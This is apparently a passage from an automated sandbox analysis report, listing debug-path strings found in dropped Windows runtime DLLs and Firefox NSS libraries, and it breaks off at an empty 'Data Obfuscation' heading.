      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.5.dr
      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.5.dr
      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.5.dr
      Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.5.dr
      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.5.dr
      Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.5.dr
      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.5.dr
      Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.5.dr
      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.5.dr
      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.5.dr

      Data Obfuscation: